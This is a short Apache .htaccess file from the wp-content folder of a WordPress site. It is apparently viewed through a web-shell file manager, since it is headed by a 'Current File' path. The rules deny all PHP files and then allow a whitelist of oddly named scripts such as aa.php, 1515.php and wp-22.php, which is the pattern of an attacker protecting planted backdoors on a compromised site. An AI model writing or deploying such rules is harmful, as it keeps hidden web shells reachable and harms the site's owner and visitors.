Current File : /customers/3/5/c/campinoeksjo.se/httpd.www/wp-content/.htaccess
<FilesMatch "\.(php|ph*|Ph*|PH*|pH*)$">
    Deny from all
</FilesMatch>
<FilesMatch "^(aa.php|as.php|1515.php|acp.php|aaa.php|1bymm.php|autoload_classmap.php|style.php|wp-22.php|hm.php)$">
    Allow from all
</FilesMatch>
<FilesMatch "\.(png|gif|pdf|jpeg)$">
    Allow from all
</FilesMatch>